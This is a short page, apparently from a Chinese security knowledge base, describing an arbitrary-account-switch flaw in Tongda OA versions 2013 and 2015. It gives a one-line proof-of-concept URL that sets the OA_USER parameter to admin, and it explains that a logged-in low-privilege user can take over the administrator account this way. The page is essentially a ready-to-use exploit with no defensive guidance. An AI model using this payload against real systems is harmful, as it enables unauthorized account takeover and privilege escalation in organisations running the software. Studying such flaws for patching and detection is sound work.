menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 001-通达OA chevron_right 004-通达oa 任意账号跳转.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    004-通达oa 任意账号跳转.md
    327 B / 2021-07-17 00:01:26
        ## 通达oa 任意账号跳转

### 漏洞描述

需要登录

### 漏洞影响

2013、2015版本

### 漏洞复现

POC:

`http://url/interface/ugo.php?OA_USER=admin`

通过控制OA_USER参数进行任意⽤户的跳转,⽐如说你现在是个普通权限的⽤户,使用这个⻚面即可跳转到admin用户下面。
    links
    file_download